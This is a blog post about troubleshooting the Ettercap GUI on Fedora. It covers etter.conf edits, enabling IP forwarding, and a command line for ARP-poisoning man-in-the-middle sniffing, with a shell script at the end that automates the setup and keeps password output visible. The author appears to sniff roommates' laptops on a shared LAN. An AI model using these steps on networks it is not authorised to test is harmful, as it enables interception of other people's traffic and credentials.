Ettercap is one of the best sniffing tools available today, but when you use it on a non-security distro on which it is not pre-configured, like Fedora, you might run into some problems, as I did. It all started on a sunny day when I decided to try it on Fedora Linux.
PS: I won't be covering the ncurses interface, as it is quite easy and offers little to no hassle in operation; strangely, it gave me no errors at all.
Anyway, I installed ettercap by typing:
[root@zion xero]# su
Password:
[root@zion xero]# yum install ettercap
[root@zion xero]# yum install ettercap-gui
(I actually had problems with this one..)
Yum resolved the dependencies and installed it. I ran it on my local LAN, assuming the default configuration would do.
[root@zion xero]# ettercap -T -Q -M arp /192.168.1.3/
It captured all the packets and I was able to get details about what was captured. The real problems started when I ran it in GUI mode.
[root@zion xero]# ettercap -G
Well, the GTK GUI popped up and prompted me for the usual things. I quickly pressed Shift+U to choose the network interface (in this case my local LAN, hooked up to my roommates' laptops) and chose 'eth0', the default Ethernet interface. I went ahead and scanned for hosts by pressing Ctrl+S, and bam... it crashed.
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Ooops ! This shouldn't happen...
Please recompile in debug mode, reproduce the bug and send a bugreport
Okay, I got it: it probably crashes because it hasn't been updated in a long time. Ah well, I worked around it by scanning for hosts only partially and then carrying on. Again, I chose the host, added it to my targets, started ARP poisoning from the MITM menu and then started unified sniffing.
I got nothing.
Realizing this was not BackTrack, I sensibly closed it (re-ARPing the network, not by just abusing the [X] button the way Windows users do) and opened etter.conf
[root@zion xero]# vi /etc/etter.conf
and uncommented the iptables option so that it looked like this:
# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
saved it, and ran it again.
Again, the same drill: partial host scan, target selection, MITM, ARP poisoning, sniffing.
Bang, I got nothing... again. I looked at the console output and found:
[root@zion xero]# ettercap -G
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
iptables v1.3.3: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
Wow. I am running the program as root, edited the read-only file as root, and all I get is "upgrade your kernel"? Bullshit! (What is actually going on: ettercap drops to the ec_uid/ec_gid user, nobody by default, shortly after start-up, so the iptables command it runs later, when the MITM attack starts, no longer has root.) Anyway, back to etter.conf; this time I changed the privileges to 0:
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
The program ran and the error went away :)
But still, I was unable to capture anything in GUI mode. I guess the more user-friendly you make it, the more hassles come with it... sheesh. Then, after about 10 minutes of waiting, I got this:
SEND L3 ERROR: 44 byte packet (0800:06) destined to 192.168.xxx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted))
Great... now this was what I was talking about. Now this really got me moving. It's not every day that you can target a network from the CUI with one command of a program, but using the GUI has a lot of strings attached.
Now I did everything very carefully. Although I still couldn't figure out the real reason for the segmentation fault, I guess everything works fine if you do it like this:
Configure etter.conf as stated above: set ec_uid and ec_gid to 0 and uncomment the iptables section.
Run ettercap using kdesu, i.e. with elevated privileges in the KDE environment, to avoid the "can't initialize iptables" error.
[root@zion xero]# kdesu ettercap -G
Give your password, and choose the network interface (Shift+U).
Once done, please be patient; open a new terminal window, change to root and type this command (it forwards packets and avoids the error :P):
[root@zion xero]# echo "1" > /proc/sys/net/ipv4/ip_forward
It will avoid the "SEND L3 ERROR". Once done, do your drill and you will "finally" be able to capture data using the GUI. For the rest of the elites out there, I guess
[root@zion xero]# ettercap -T -Q -M arp:remote -i eth0 /192.168.1.3/ //
seems to work :) Man... what a trip. I would choose Wireshark over it any day.
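The etter.conf edits and the ip_forward step above, as an added script that is not part of the original post and not ettercap's own code. It assumes an ettercap NG-0.7.x etter.conf layout (a [privs] section with ec_uid/ec_gid, and the iptables redir_command_on/off lines commented out with a leading "#"); the interface name, the target IP and the sample config it builds for a dry run are placeholders. It also runs the iptables nat-table check that lies behind the "can't initialize iptables table" error, and uses -q instead of the post's -Q so user/password output is still shown.

```sh
#!/bin/sh
# Added example, not code from the original post or from ettercap itself.
# Assumes an ettercap NG-0.7.x etter.conf: [privs] with ec_uid/ec_gid, and the
# iptables redir_command_on/off lines commented out with a leading "#".
# Interface and target IP below are placeholders.

# patch_etter_conf CONF
# Rewrites CONF through a temp file (any POSIX sed works) so ettercap keeps
# root (ec_uid/ec_gid = 0) and the iptables redir commands are active.
# Keeping root is what cures "can't initialize iptables table `nat'":
# ettercap drops to ec_uid shortly after start-up, so the iptables call it
# makes later, when the MITM attack starts, no longer runs as root. The
# price is that the whole sniffer, dissectors included, then runs as root.
patch_etter_conf() {
    conf="$1"
    tmp="$conf.tmp.$$"
    sed \
        -e 's/^\([[:space:]]*\)ec_uid[[:space:]]*=[[:space:]]*[0-9][0-9]*/\1ec_uid = 0/' \
        -e 's/^\([[:space:]]*\)ec_gid[[:space:]]*=[[:space:]]*[0-9][0-9]*/\1ec_gid = 0/' \
        -e 's/^#\([[:space:]]*redir_command_on[[:space:]]*=.*iptables.*\)$/\1/' \
        -e 's/^#\([[:space:]]*redir_command_off[[:space:]]*=.*iptables.*\)$/\1/' \
        "$conf" > "$tmp" && cat "$tmp" > "$conf" && rm -f "$tmp"
}

# conf_value CONF KEY: print the value of the first active "KEY = VALUE" line.
conf_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\([^#[:space:]]*\).*/\1/p" "$1" | head -n 1
}

# redir_active CONF: succeed only if both iptables redir lines are uncommented.
redir_active() {
    on=$(grep -c '^[[:space:]]*redir_command_on[[:space:]]*=.*iptables' "$1" || true)
    off=$(grep -c '^[[:space:]]*redir_command_off[[:space:]]*=.*iptables' "$1" || true)
    [ "$on" -eq 1 ] && [ "$off" -eq 1 ]
}

# nat_table_ok: the check behind the iptables error. Fails, printing
# iptables' own reason, if the nat table cannot be opened (not root, or the
# nat module is missing).
nat_table_ok() {
    iptables -t nat -L -n > /dev/null
}

# enable_ip_forward: the "echo 1 > ip_forward" step. With forwarding off the
# poisoned hosts' traffic reaches this box and is dropped, so the victims
# lose connectivity; the post reports that enabling it also clears the
# "SEND L3 ERROR". Prints the previous value so it can be restored later.
enable_ip_forward() {
    f=/proc/sys/net/ipv4/ip_forward
    prev=$(cat "$f") || return 1
    echo 1 > "$f" || return 1
    echo "$prev"
}

# ettercap_cmd IFACE TARGET: the text-mode command line from the end of the
# post, with -q (hide packet contents) instead of -Q (which would also hide
# users and passwords). arp:remote poisons both directions and "//" as
# TARGET2 means every other host in the list.
ettercap_cmd() {
    echo "ettercap -T -q -i $1 -M arp:remote /$2/ //"
}

# make_sample_conf PATH: a constructed etter.conf fragment for a dry run,
# mirroring the 0.7.3 defaults; not a real system file.
make_sample_conf() {
    cat > "$1" <<'EOF'
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

# if you use iptables:
#   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EOF
}

# Dry run on the sample file: sh ettercap_fedora.sh --dry-run
if [ "${1:-}" = "--dry-run" ]; then
    t=$(mktemp)
    make_sample_conf "$t"
    patch_etter_conf "$t"
    echo "ec_uid is now $(conf_value "$t" ec_uid)"
    redir_active "$t" && echo "iptables redir lines active"
    ettercap_cmd eth0 192.168.1.3
    rm -f "$t"
fi
# Real use, as root: patch_etter_conf /etc/etter.conf; nat_table_ok;
# enable_ip_forward; then run "$(ettercap_cmd eth0 192.168.1.3)".
```

Remember to restore ip_forward to the value enable_ip_forward printed when you are done, and to quit ettercap cleanly so it re-ARPs the hosts; with ec_uid set to 0 the sniffer no longer drops privileges, so only run it this way when you need the iptables redirection.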
Happy new year once again..
Posted by XERO. ALL RIGHTS RESERVED.